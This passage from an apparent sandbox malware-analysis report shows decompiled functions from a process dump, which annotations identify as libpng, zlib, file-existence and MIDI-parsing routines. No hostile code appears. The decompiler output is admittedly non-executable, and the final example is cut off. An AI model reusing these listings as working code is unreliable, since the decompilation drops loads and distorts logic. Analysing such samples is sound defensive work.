    												_t658 = _t688;
    												do {
    													_t346 =  *((intOrPtr*)(_t685 + 0x144));
    													 *(_t591 + _t346 + 1) =  *(_t591 + _t346 + 1) >> 8;
    													_t323 = _t346 + 1; // 0x1
    													_t344 = _t591 + _t323;
    													_t591 = _t591 + 3;
    													_t658 = _t658 - 1;
    												} while (_t658 != 0);
    												goto L131;
    											}
    										} else {
    											_t659 = 0;
    											_t502 = 0;
    											do {
    												_t347 =  *((intOrPtr*)(_t685 + 0x144));
    												 *(_t347 + _t659) =  *(_t347 + _t659) >> 8;
    												_t344 = _t347 + _t659;
    												_t659 = _t659 + 3;
    												_t502 = _t502 - 1;
    											} while (_t502 != 0);
    											goto L126;
    										}
    									}
    								} else {
    									_t457 =  *((intOrPtr*)(_t685 + 0x144));
    									_t704 =  *((intOrPtr*)(_t685 + 0x150));
    									_t668 = 0;
    									 *(_t716 + 0x21) =  *(_t685 + 0x16c);
    									_t648 =  *(_t685 + 0x16e);
    									 *((intOrPtr*)(_t716 + 0x14)) = 0;
    									 *(_t716 + 0x20) =  *(_t685 + 0x16a);
    									if(0 <= 0) {
    										L58:
    										_t350 =  *(_t685 + 0x7c) & 0x0000007f;
    										L117:
    										 *(_t685 + 0x7c) = _t350;
    										goto L118;
    									}
    									_t459 = _t457 + 2;
    									do {
    										_t563 =  *( *((intOrPtr*)(_t685 + 0x1b4)) + _t668);
    										if(_t563 != 0) {
    											__eflags = _t563 - 0xff;
    											if(_t563 != 0xff) {
    												_t564 = _t563 & 0x000000ff;
    												_t123 = ( *(_t459 - 2) & 0x000000ff) * _t564 + 0x80; // 0x17f
    												 *(_t459 - 2) = (((0x000000ff - _t564) * ( *(_t716 + 0x20) & 0x000000ff) + _t123 & 0x0000ffff) >> 8) + ((0x000000ff - _t564) * ( *(_t716 + 0x20) & 0x000000ff) + _t123 & 0x0000ffff) >> 8;
    												_t568 =  *( *((intOrPtr*)(_t685 + 0x1b4)) + _t668) & 0x000000ff;
    												_t130 = ( *(_t459 - 1) & 0x000000ff) * _t568 + 0x80; // 0x17f
    												 *(_t459 - 1) = (((0x000000ff - _t568) * ( *(_t716 + 0x21) & 0x000000ff) + _t130 & 0x0000ffff) >> 8) + ((0x000000ff - _t568) * ( *(_t716 + 0x21) & 0x000000ff) + _t130 & 0x0000ffff) >> 8;
    												_t572 =  *( *((intOrPtr*)(_t685 + 0x1b4)) + _t668) & 0x000000ff;
    												_t135 = ( *_t459 & 0x000000ff) * _t572 + 0x80; // 0x17f
    												_t704 =  *((intOrPtr*)(_t716 + 0x14));
    												_t526 = (((0x000000ff - _t572) * (_t648 & 0x000000ff) + _t135 & 0x0000ffff) >> 8) + ((0x000000ff - _t572) * (_t648 & 0x000000ff) + _t135 & 0x0000ffff);
    												__eflags = _t526;
    												 *_t459 = _t526 >> 8;
    											}
    										} else {
    											 *(_t459 - 2) =  *(_t716 + 0x20);
    											(_t459 - 2)[2] = _t648;
    										}
    										_t668 = _t668 + 1;
    										_t459 =  &(_t459[3]);
    									} while (_t668 < _t704);
    									goto L58;
    								}
    							}
    							_t460 = E00441800( *(_t685 + 0x18c));
    							_t716 = _t716 + 4;
    							if(_t460 != 0) {
    								goto L59;
    							}
    							goto L49;
    						}
    						_t461 = E00441800( *(_t685 + 0x2dc));
    						_t716 = _t716 + 4;
    						if(_t461 != 0) {
    							goto L59;
    						}
    						_t463 = E00441800( *(_t685 + 0x18c));
    						_t716 = _t716 + 4;
    						if(_t463 != 0) {
    							goto L59;
    						}
    						if( *((char*)(_t685 + 0x162)) != 3) {
    							goto L47;
    						}
    						_t464 = E00441800( *((intOrPtr*)(_t685 + 0x164)));
    						_t716 = _t716 + 4;
    						if(_t464 != 0) {
    							goto L59;
    						}
    						goto L47;
    					}
    					_t466 = E00441800( *(_t685 + 0x2dc));
    					_t716 = _t716 + 4;
    					if(_t466 != 0) {
    						goto L59;
    					}
    					_t467 = E00441800( *(_t685 + 0x18c));
    					_t716 = _t716 + 4;
    					if(_t467 != 0) {
    						goto L59;
    					}
    					goto L42;
    				}
    			}

    Strings
    • invalid background gamma type, xrefs: 0044F6DC
    • libpng does not support gamma+background+rgb_to_gray, xrefs: 0044F35C
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID: invalid background gamma type$libpng does not support gamma+background+rgb_to_gray
    • API String ID: 0-3995106164
    • Opcode ID: 16400ee2568a597f2f674fd193b3581df06bc4193968c6dd15c75c90c8020480
    • Instruction ID: d3eb3f5b50e70e07c0cd6cd74311739468c4a7ad6554e2fcd37aeb85d1dd5655
    • Opcode Fuzzy Hash: 16400ee2568a597f2f674fd193b3581df06bc4193968c6dd15c75c90c8020480
    • Instruction Fuzzy Hash: BE623975508B824AE331DB35C8417F7FBE1AF9A304F08493ED8EA87352E639A449C759
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			/* Path-existence probe. FindFirstFileA returns INVALID_HANDLE_VALUE (0xffffffff) when nothing
    			   matches; it also succeeds for directories and wildcard patterns, so a result of 1 does not
    			   mean "regular file". Needs <windows.h>. The decompiler's uninitialised _t8 pointer is really a
    			   WIN32_FIND_DATAA out-buffer on the stack, declared as such here. */
    			int E0041EED0(CHAR* _a4) {
    				HANDLE _t3;
    				WIN32_FIND_DATAA _t8;   /* receives the first match; its contents are never used */
    
    				_t3 = FindFirstFileA(_a4, &_t8);
    				if(_t3 == INVALID_HANDLE_VALUE) {   /* 0xffffffff */
    					return 0;
    				} else {
    					FindClose(_t3);   /* release the search handle before reporting success */
    					return 1;
    				}
    			}

    Instruction addresses for the listing above (the report's per-statement side column; its alignment with the C lines was lost in extraction): 0x0041eee0 to 0x0041ef06.

    APIs
    • FindFirstFileA.KERNEL32(?,?), ref: 0041EEE0
    • FindClose.KERNEL32(00000000), ref: 0041EEEC
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true (associated dumps and IDA snapshot identical to those listed for the previous function)
    Similarity
    • API ID: Find$CloseFileFirst
    • String ID:
    • API String ID: 2295610775-0
    • Opcode ID: d1ad6c1bbd110ba421fe9f2defa250fd2001864ccff6aa6cdad026061469ae5a
    • Instruction ID: bac2b9e4e48bf69d3342e3353a6fefdc38e0cb298efe00baf2fd2b4b41590976
    • Opcode Fuzzy Hash: d1ad6c1bbd110ba421fe9f2defa250fd2001864ccff6aa6cdad026061469ae5a
    • Instruction Fuzzy Hash: 97D0A7744002017BD3219B75DD086FB3358BB44320FC40A35BD2CC12F0F67EC8588511
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			/* Matches zlib's inflate_fast (inffast.c): the table at 0x4b83a0 serves as inflate_mask[], the
    			   0x10 / 0x20 / 0x40 tests on a code entry's exop byte are the length / end-of-block / invalid
    			   flags, and the returns are 0 (Z_OK), 1 (Z_STREAM_END) and 0xfffffffd (-3, Z_DATA_ERROR) with
    			   the two error strings below stored as z->msg. This is statically linked library code, not
    			   sample-specific logic. The decompiler dropped the input-byte loads: the "0 << k" terms stand
    			   for NEXTBYTE << k and "if(0 == 0)" for "exop == 0", so the listing is not executable as written. */
    			E00468080() {
    				unsigned int _t147;
    				unsigned int _t152;
    				intOrPtr _t161;
    				signed char _t163;
    				intOrPtr _t164;
    				signed int _t165;
    				signed char _t167;
    				signed int _t168;
    				signed int _t171;
    				intOrPtr _t177;
    				intOrPtr _t180;
    				signed int _t183;
    				signed int _t191;
    				signed int _t199;
    				signed int _t216;
    				char* _t223;
    				void* _t224;
    				signed char _t227;
    				signed int _t229;
    				signed int _t236;
    				signed int _t246;
    				signed int _t253;
    				unsigned int _t256;
    				unsigned int _t259;
    				intOrPtr* _t264;
    				void* _t267;
    				void* _t268;
    				signed int _t270;
    				intOrPtr _t277;
    				intOrPtr _t278;
    				void* _t279;
    				char* _t280;
    				signed int _t283;
    				intOrPtr _t284;
    				signed int _t286;
    				intOrPtr _t287;
    				void* _t288;
    				intOrPtr _t291;
    				intOrPtr* _t296;
    				intOrPtr* _t299;
    				intOrPtr* _t300;
    				signed int _t302;
    				intOrPtr _t303;
    				signed int _t305;
    				signed int _t308;
    				intOrPtr _t309;
    				intOrPtr _t312;
    				intOrPtr _t313;
    				intOrPtr _t314;
    				intOrPtr _t315;
    				void* _t316;
    
    				_t183 =  *(_t316 + 0x28);
    				_t161 =  *((intOrPtr*)(_t183 + 0x34));
    				_t277 =  *((intOrPtr*)(_t183 + 0x30));
    				_t256 =  *(_t183 + 0x20);
    				_t264 =  *((intOrPtr*)(_t316 + 0x3c));
    				 *((intOrPtr*)(_t316 + 0x14)) = _t161;
    				_t312 =  *_t264;
    				 *((intOrPtr*)(_t316 + 0x10)) =  *((intOrPtr*)(_t264 + 4));
    				_t147 =  *(_t183 + 0x1c);
    				if(_t161 >= _t277) {
    					 *((intOrPtr*)(_t316 + 0x18)) =  *((intOrPtr*)(_t183 + 0x2c)) - _t161;
    				} else {
    					 *((intOrPtr*)(_t316 + 0x18)) = _t277 - _t161 - 1;
    				}
    				 *(_t316 + 0x1c) =  *(0x4b83a0 +  *(_t316 + 0x28) * 4);
    				 *(_t316 + 0x20) =  *(0x4b83a0 +  *(_t316 + 0x2c) * 4);
    				L4:
    				while(1) {
    					while(_t147 < 0x14) {
    						 *((intOrPtr*)(_t316 + 0x10)) =  *((intOrPtr*)(_t316 + 0x10)) - 1;
    						_t286 = 0 << _t147;
    						_t147 = _t147 + 8;
    						_t256 = _t256 | _t286;
    						_t312 = _t312 + 1;
    					}
    					_t278 =  *((intOrPtr*)(_t316 + 0x30));
    					_t191 =  *(_t316 + 0x1c) & _t256;
    					_t163 =  *((intOrPtr*)(_t278 + _t191 * 8));
    					_t279 = _t278 + _t191 * 8;
    					if(0 == 0) {
    						L26:
    						_t256 = _t256 >>  *(_t279 + 1);
    						_t147 = _t147;
    						_t280 =  *((intOrPtr*)(_t316 + 0x14));
    						 *_t280 =  *((intOrPtr*)(_t279 + 4));
    						 *((intOrPtr*)(_t316 + 0x14)) = _t280 + 1;
    						 *((intOrPtr*)(_t316 + 0x18)) =  *((intOrPtr*)(_t316 + 0x18)) - 1;
    						goto L27;
    					} else {
    						_t256 = _t256 >>  *(_t279 + 1);
    						_t147 = _t147;
    						 *(_t316 + 0x2c) = 0;
    						if((_t163 & 0x00000010) != 0) {
    							L11:
    							_t165 = _t163 & 0x0000000f;
    							_t152 = _t147 - _t165;
    							 *(_t316 + 0x28) = ( *(0x4b83a0 + _t165 * 4) & _t256) +  *((intOrPtr*)(_t279 + 4));
    							_t259 = _t256 >> _t165;
    							while(_t152 < 0xf) {
    								 *((intOrPtr*)(_t316 + 0x10)) =  *((intOrPtr*)(_t316 + 0x10)) - 1;
    								_t305 = 0 << _t152;
    								_t152 = _t152 + 8;
    								_t259 = _t259 | _t305;
    								_t312 = _t312 + 1;
    							}
    							_t287 =  *((intOrPtr*)(_t316 + 0x34));
    							_t216 =  *(_t316 + 0x20) & _t259;
    							_t167 =  *((intOrPtr*)(_t287 + _t216 * 8));
    							_t288 = _t287 + _t216 * 8;
    							_t256 = _t259 >>  *(_t288 + 1);
    							_t147 = _t152;
    							 *(_t316 + 0x2c) = 0;
    							if((_t167 & 0x00000010) != 0) {
    								L16:
    								_t168 = _t167 & 0x0000000f;
    								while(_t147 < _t168) {
    									 *((intOrPtr*)(_t316 + 0x10)) =  *((intOrPtr*)(_t316 + 0x10)) - 1;
    									_t227 = _t147;
    									_t147 = _t147 + 8;
    									_t256 = _t256 | 0 << _t227;
    									_t312 = _t312 + 1;
    								}
    								_t267 = ( *(0x4b83a0 + _t168 * 4) & _t256) +  *((intOrPtr*)(_t288 + 4));
    								_t256 = _t256 >> _t168;
    								_t147 = _t147 - _t168;
    								 *((intOrPtr*)(_t316 + 0x18)) =  *((intOrPtr*)(_t316 + 0x18)) -  *(_t316 + 0x28);
    								_t291 =  *((intOrPtr*)( *((intOrPtr*)(_t316 + 0x38)) + 0x28));
    								_t223 =  *((intOrPtr*)(_t316 + 0x14));
    								if(_t223 - _t291 < _t267) {
    									_t171 =  *(_t316 + 0x28);
    									_t268 = _t291 - _t223 + _t267;
    									_t296 =  *((intOrPtr*)( *((intOrPtr*)(_t316 + 0x38)) + 0x2c)) - _t268;
    									if(_t171 > _t268) {
    										 *(_t316 + 0x28) = _t171 - _t268;
    										do {
    											 *_t223 =  *_t296;
    											_t223 = _t223 + 1;
    											_t296 = _t296 + 1;
    											_t268 = _t268 - 1;
    										} while (_t268 != 0);
    										_t296 =  *((intOrPtr*)( *((intOrPtr*)(_t316 + 0x38)) + 0x28));
    									}
    								} else {
    									_t299 = _t223 - _t267;
    									_t224 = _t223 + 1;
    									_t300 = _t299 + 1;
    									 *((char*)(_t224 - 1)) =  *_t299;
    									_t223 = _t224 + 1;
    									_t296 = _t300 + 1;
    									 *((char*)(_t223 - 1)) =  *_t300;
    									 *(_t316 + 0x28) =  *(_t316 + 0x28) - 2;
    									do {
    										goto L24;
    									} while (_t270 != 0);
    									_t264 =  *((intOrPtr*)(_t316 + 0x3c));
    									 *((intOrPtr*)(_t316 + 0x14)) = _t223;
    									L27:
    									_t164 =  *((intOrPtr*)(_t316 + 0x10));
    									if( *((intOrPtr*)(_t316 + 0x18)) < 0x102 || _t164 < 0xa) {
    										_t199 =  *((intOrPtr*)(_t264 + 4)) - _t164;
    										_t283 = _t147 >> 3;
    										if(_t283 < _t199) {
    											_t199 = _t283;
    										}
    										_t284 =  *((intOrPtr*)(_t316 + 0x38));
    										_t313 = _t312 - _t199;
    										 *(_t284 + 0x20) = _t256;
    										 *((intOrPtr*)(_t284 + 0x1c)) = _t147 - _t199 * 8;
    										 *((intOrPtr*)(_t264 + 4)) = _t199 + _t164;
    										 *_t264 = _t313;
    										 *((intOrPtr*)(_t264 + 8)) =  *((intOrPtr*)(_t264 + 8)) + _t313 -  *_t264;
    										 *((intOrPtr*)(_t284 + 0x34)) =  *((intOrPtr*)(_t316 + 0x14));
    										return 0;
    									} else {
    										continue;
    									}
    									goto L42;
    								}
    								L24:
    								 *_t223 =  *_t296;
    								_t223 = _t223 + 1;
    								_t296 = _t296 + 1;
    								_t270 =  *(_t316 + 0x28) - 1;
    								 *(_t316 + 0x28) = _t270;
    							} else {
    								while((_t167 & 0x00000040) == 0) {
    									_t236 = ( *(0x4b83a0 + _t167 * 4) & _t256) +  *((intOrPtr*)(_t288 + 4));
    									_t167 =  *((intOrPtr*)(_t288 + _t236 * 8));
    									_t288 = _t288 + _t236 * 8;
    									_t256 = _t256 >>  *(_t288 + 1);
    									_t147 = _t147;
    									 *(_t316 + 0x2c) = 0;
    									if((_t167 & 0x00000010) == 0) {
    										continue;
    									} else {
    										goto L16;
    									}
    									goto L42;
    								}
    								_t177 =  *((intOrPtr*)(_t316 + 0x10));
    								_t229 =  *((intOrPtr*)(_t264 + 4)) - _t177;
    								_t302 = _t147 >> 3;
    								 *(_t264 + 0x18) = "invalid distance code";
    								if(_t302 < _t229) {
    									goto L40;
    								}
    								goto L41;
    							}
    						} else {
    							while((_t163 & 0x00000040) == 0) {
    								_t253 = ( *(0x4b83a0 + _t163 * 4) & _t256) +  *((intOrPtr*)(_t279 + 4));
    								_t163 =  *((intOrPtr*)(_t279 + _t253 * 8));
    								_t279 = _t279 + _t253 * 8;
    								if(0 == 0) {
    									goto L26;
    								} else {
    									_t256 = _t256 >>  *(_t279 + 1);
    									_t147 = _t147;
    									 *(_t316 + 0x2c) = 0;
    									if((_t163 & 0x00000010) == 0) {
    										continue;
    									} else {
    										goto L11;
    									}
    								}
    								goto L42;
    							}
    							if((_t163 & 0x00000020) == 0) {
    								_t177 =  *((intOrPtr*)(_t316 + 0x10));
    								_t229 =  *((intOrPtr*)(_t264 + 4)) - _t177;
    								_t302 = _t147 >> 3;
    								 *(_t264 + 0x18) = "invalid literal/length code";
    								if(_t302 < _t229) {
    									L40:
    									_t229 = _t302;
    								}
    								L41:
    								_t303 =  *((intOrPtr*)(_t316 + 0x38));
    								_t314 = _t312 - _t229;
    								 *(_t303 + 0x20) = _t256;
    								 *((intOrPtr*)(_t303 + 0x1c)) = _t147 - _t229 * 8;
    								 *((intOrPtr*)(_t264 + 4)) = _t229 + _t177;
    								 *_t264 = _t314;
    								 *((intOrPtr*)(_t264 + 8)) =  *((intOrPtr*)(_t264 + 8)) + _t314 -  *_t264;
    								 *((intOrPtr*)(_t303 + 0x34)) =  *((intOrPtr*)(_t316 + 0x14));
    								return 0xfffffffd;
    							} else {
    								_t180 =  *((intOrPtr*)(_t316 + 0x10));
    								_t246 =  *((intOrPtr*)(_t264 + 4)) - _t180;
    								_t308 = _t147 >> 3;
    								if(_t308 < _t246) {
    									_t246 = _t308;
    								}
    								_t309 =  *((intOrPtr*)(_t316 + 0x38));
    								_t315 = _t312 - _t246;
    								 *(_t309 + 0x20) = _t256;
    								 *((intOrPtr*)(_t309 + 0x1c)) = _t147 - _t246 * 8;
    								 *((intOrPtr*)(_t264 + 4)) = _t246 + _t180;
    								 *_t264 = _t315;
    								 *((intOrPtr*)(_t264 + 8)) =  *((intOrPtr*)(_t264 + 8)) + _t315 -  *_t264;
    								 *((intOrPtr*)(_t309 + 0x34)) =  *((intOrPtr*)(_t316 + 0x14));
    								return 1;
    							}
    						}
    					}
    					L42:
    				}
    			}

    Instruction addresses for the listing above (the report's per-statement side column; its alignment with the C lines was lost in extraction): 0x00468083 to 0x0046840e; entries of 0x00000000 mark statements without a code address.

    Strings
    • invalid distance code, xrefs: 00468302
    • invalid literal/length code, xrefs: 004683C6
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true (associated dumps and IDA snapshot identical to those listed for the first function above)
    Similarity
    • API ID:
    • String ID: invalid distance code$invalid literal/length code
    • API String ID: 0-1393003055
    • Opcode ID: d7137552c1f7949f0ac454cb51f527cfea54f5a9eeba1bcf2726b97dc7e54ca1
    • Instruction ID: 8c43a1f8df1f769678fe5b45a8d56f38297c3618a8b4f4d388801401877cbf6d
    • Opcode Fuzzy Hash: d7137552c1f7949f0ac454cb51f527cfea54f5a9eeba1bcf2726b97dc7e54ca1
    • Instruction Fuzzy Hash: 91C1C0716087518FC718CF2DD5A016AFBE1FB89310F194A6EE8DA93741CB74A815CB8A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 73%
    			/* Matches libpng's png_read_start_row (pngrutil.c): sizes the row buffers from width, bit depth,
    			   channel count and interlace pass, calls png_error (E00449530) with the "Row has too many bytes..."
    			   message when rowbytes + 1 would overflow (the > 0xfffffffe test), checks the current chunk name
    			   against 0x49444154 ("IDAT" as a big-endian dword) and finally sets flags |= 0x40
    			   (PNG_FLAG_ROW_INIT). The 0x55555556 multiply-and-shift is a divide by 3. Statically linked
    			   library code, not sample-specific logic. */
    			E0044E700(void* __edi, void* __fp0) {
    				unsigned int _t96;
    				signed int _t107;
    				intOrPtr _t116;
    				intOrPtr _t117;
    				signed int _t127;
    				signed int _t134;
    				signed char _t137;
    				signed int _t142;
    				signed int _t147;
    				signed int _t148;
    				intOrPtr _t164;
    				intOrPtr _t173;
    				unsigned int _t178;
    				intOrPtr _t183;
    				signed int _t187;
    				signed int _t190;
    				signed int _t191;
    				void* _t214;
    				signed int _t216;
    				signed int _t217;
    				intOrPtr _t218;
    				void* _t219;
    				intOrPtr _t223;
    				signed int _t224;
    				void* _t225;
    				void* _t226;
    				void* _t228;
    				void* _t231;
    
    				_t214 = __edi;
    				_t223 =  *((intOrPtr*)(_t225 + 0x10));
    				_push(_t223);
    				E0044EED0(__fp0);
    				_t226 = _t225 + 4;
    				if( *((intOrPtr*)(_t223 + 0x154)) == 0) {
    					_t224 =  *(_t223 + 0x100);
    					 *(_t223 + 0x108) =  *(_t223 + 0x104);
    					 *(_t223 + 0x114) = _t224;
    				} else {
    					if(( *(_t223 + 0x7c) & 0x00000002) != 0) {
    						_t127 =  *(_t223 + 0x104);
    					} else {
    						_t134 =  *0x499038; // 0x40000
    						_t187 =  *0x499040; // 0x4080808
    						_t127 = ( *(_t223 + 0x104) - (_t134 & 0x000000ff) + (_t187 & 0x000000ff) - 1) / (_t187 & 0x000000ff);
    					}
    					_t224 =  *(_t223 + 0x100);
    					 *(_t223 + 0x108) = _t127;
    					 *(_t223 + 0x114) = (_t224 + 0xffffffffffffffff) / 0;
    				}
    				_t137 =  *(_t223 + 0x7c);
    				_t96 =  *((intOrPtr*)(_t223 + 0x15a));
    				if((_t137 & 0x00000004) != 0 &&  *((char*)(_t223 + 0x158)) < 8) {
    					_t96 = 8;
    				}
    				_push(_t214);
    				_t216 = _t137 & 0x00001000;
    				if(_t216 != 0) {
    					_t183 =  *((intOrPtr*)(_t223 + 0x157));
    					if(_t183 != 3) {
    						if(_t183 != 0) {
    							if(_t183 == 2 &&  *(_t223 + 0x150) != 0) {
    								_t96 = (0x55555556 * _t96 * 4 >> 0x20) + (0x55555556 * _t96 * 4 >> 0x20 >> 0x1f);
    							}
    						} else {
    							if(_t96 < 8) {
    								_t96 = 8;
    							}
    							if( *(_t223 + 0x150) != 0) {
    								_t96 = _t96 + _t96;
    							}
    						}
    					} else {
    						asm("sbb eax, eax");
    						_t96 = ( ~( *(_t223 + 0x150)) & 0x00000008) + 0x18;
    					}
    				}
    				if((_t137 & 0x00000002) != 0) {
    					if(_t216 == 0) {
    						 *(_t223 + 0x7c) = _t137 & 0x000000fd;
    					} else {
    						if( *((char*)(_t223 + 0x158)) < 0x10) {
    							_t96 = _t96 + _t96;
    						}
    					}
    				}
    				_t217 =  *(_t223 + 0x7c);
    				_t190 = _t217 & 0x00008000;
    				if(_t190 == 0) {
    					L32:
    					if((_t217 & 0x00004000) == 0) {
    						L41:
    						if((_t217 & 0x00100000) != 0 && 0 > _t96) {
    							_t96 = 0;
    						}
    						 *(_t223 + 0x15e) = _t96;
    						_t142 = _t224 + 0x00000007 & 0xfffffff8;
    						 *((char*)(_t223 + 0x15f)) = 0;
    						if(_t96 < 8) {
    							_t191 = _t142 * _t96 + 7 >> 3;
    						} else {
    							_t191 = (_t96 >> 3) * _t142;
    						}
    						_t218 = (_t96 + 7 >> 3) + _t191 + 1 + 0x30;
    						if(_t218 >  *((intOrPtr*)(_t223 + 0x2b4))) {
    							E00449E80(_t223,  *((intOrPtr*)(_t223 + 0x27c)));
    							E00449E80(_t223,  *((intOrPtr*)(_t223 + 0x2c8)));
    							_t231 = _t226 + 0x10;
    							_push(_t218);
    							_push(_t223);
    							if( *((intOrPtr*)(_t223 + 0x154)) == 0) {
    								_t116 = E00449E10();
    							} else {
    								_t116 = E00449C70(_t218);
    							}
    							 *((intOrPtr*)(_t223 + 0x27c)) = _t116;
    							_t117 = E00449E10(_t223, _t218);
    							_t226 = _t231 + 0x10;
    							 *((intOrPtr*)(_t223 + 0x2c8)) = _t117;
    							 *((intOrPtr*)(_t223 + 0x2b4)) = _t218;
    							 *((intOrPtr*)(_t223 + 0x124)) =  *((intOrPtr*)(_t223 + 0x27c)) + 0x20 - ( *((intOrPtr*)(_t223 + 0x27c)) + 0x00000020 & 0x0000000f) - 1;
    							 *(_t223 + 0x120) = _t117 + 0x20 - (_t117 + 0x00000020 & 0x0000000f) - 1;
    						}
    						if( *((intOrPtr*)(_t223 + 0x110)) > 0xfffffffe) {
    							E00449530(_t223, "Row has too many bytes to allocate in memory");
    							_t226 = _t226 + 8;
    						}
    						_t219 =  *(_t223 + 0x120);
    						_t147 =  *((intOrPtr*)(_t223 + 0x110)) + 1;
    						_t148 = _t147 >> 2;
    						/* decompiled rep stosd + rep stosb: zeroes rowbytes + 1 bytes of the buffer at +0x120, as libpng does for prev_row */
    						memset(_t219 + _t148, memset(_t219, 0, _t148 << 2), (_t147 & 0x00000003) << 0);
    						_t228 = _t226 + 0x18;
    						_t104 =  *((intOrPtr*)(_t223 + 0x2b8));
    						if( *((intOrPtr*)(_t223 + 0x2b8)) != 0) {
    							 *((intOrPtr*)(_t223 + 0x2bc)) = 0;
    							 *((intOrPtr*)(_t223 + 0x2b8)) = 0;
    							E00449E80(_t223, _t104);
    							_t228 = _t228 + 8;
    						}
    						if(E0044B8D0(_t223, 0x49444154) != 0) {
    							E00449530(_t223,  *((intOrPtr*)(_t223 + 0x9c)));
    						}
    						_t107 =  *(_t223 + 0x78) | 0x00000040;
    						 *(_t223 + 0x78) = _t107;
    						return _t107;
    					}
    					if( *(_t223 + 0x150) == 0 || (_t217 & 0x00001000) == 0) {
    						if(_t190 != 0) {
    							goto L40;
    						}
    						_t164 =  *((intOrPtr*)(_t223 + 0x157));
    						if(_t164 == 4) {
    							goto L40;
    						}
    						if(_t96 > 8) {
    							asm("sbb ecx, ecx");
    							_t96 = ( ~(_t164 - 6) & 0xfffffff0) + 0x40;
    						} else {
    							asm("sbb ecx, ecx");
    							_t96 = ( ~(_t164 - 6) & 0xfffffff8) + 0x20;
    						}
    					} else {
    						L40:
    						_t96 = ((0 | _t96 - 0x00000010 > 0x00000000) - 0x00000001 & 0xffffffe0) + 0x40;
    					}
    					goto L41;
    				} else {
    					_t173 =  *((intOrPtr*)(_t223 + 0x157));
    					if(_t173 != 0) {
    						if(_t173 == 2 || _t173 == 3) {
    							_t178 = ((0 | _t96 - 0x00000020 > 0x00000000) - 0x00000001 & 0xffffffe0) + 0x40;
    							goto L31;
    						} else {
    							goto L32;
    						}
    					} else {
    						_t178 = ((0 | _t96 - 0x00000008 > 0x00000000) - 0x00000001 & 0xfffffff0) + 0x20;
    						L31:
    						_t96 = _t178;
    						goto L32;
    					}
    				}
    			}

    Instruction addresses for the listing above (the report's per-statement side column; its alignment with the C lines was lost in extraction): 0x0044e700 to 0x0044ea47; entries of 0x00000000 mark statements without a code address.

    Strings
    • VUUU, xrefs: 0044E818 (not a genuine string: these are the bytes 56 55 55 55 of the immediate 0x55555556, the multiply-and-shift divide-by-3 constant visible in the C-code above)
    • Row has too many bytes to allocate in memory, xrefs: 0044E9CC
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true (associated dumps and IDA snapshot identical to those listed for the first function above)
    Similarity
    • API ID:
    • String ID: Row has too many bytes to allocate in memory$VUUU
    • API String ID: 0-4092465491
    • Opcode ID: 4e906f6c4c4e9df61761cde4e437a0bb8b89d21aa47a8e28724e1d30fd6221a1
    • Instruction ID: 80edfd695f178fd55a1b1c708efd7f0ac74c16b442fcf20f366ce3f7a0459520
    • Opcode Fuzzy Hash: 4e906f6c4c4e9df61761cde4e437a0bb8b89d21aa47a8e28724e1d30fd6221a1
    • Instruction Fuzzy Hash: 64912771A04E404BF7299A3ACC567F7B7D2BB99315F18492ED5ABC7382D63CA840C358
    Uniqueness

    Uniqueness Score: -1.00%
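
    The listing that follows, E00428220, byte-swaps the 32-bit value at offset 4 of its input and requires it to equal 6, copies three big-endian 16-bit fields from offsets 8, 10 and 12 into its context at +0xc, +0x10 and +0x14, and then loops comparing 32-bit words against 0x6b72544d, which is the ASCII tag "MTrk" loaded as a little-endian dword. That is the Standard MIDI File layout: an MThd chunk whose length field is always 6, followed by MTrk chunks. The C below is an added example, not code from the sample or from the Joe Sandbox report, that walks that layout on constructed input so the identification can be checked against a real file. The field names, the "MThd" tag check and the sample bytes are assumptions and constructed data, not taken from the listing.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Big-endian readers. E00428220 byte-swaps the dword at offset 4 before
 * comparing it with 6, so the on-disk integers are big-endian. */
static uint32_t rd_be32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}
static uint16_t rd_be16(const uint8_t *p) {
    return (uint16_t)(((uint16_t)p[0] << 8) | p[1]);
}

/* Field names are assumptions: E00428220 stores the three 16-bit values at
 * +0xc, +0x10 and +0x14 of its context object without naming them. */
struct smf_header {
    uint16_t format;
    uint16_t ntrks;
    uint16_t division;
    size_t   first_chunk;   /* offset of the first chunk after the 14-byte header */
};

/* Returns 0 on success, -1 if the buffer is short or the header length is
 * not 6 (the comparison with 6 in E00428220). The "MThd" tag check is an
 * assumption; the listing calls a helper (E00428200) before the length test. */
int smf_parse_header(const uint8_t *buf, size_t len, struct smf_header *h) {
    if (len < 14 || memcmp(buf, "MThd", 4) != 0) return -1;
    if (rd_be32(buf + 4) != 6) return -1;
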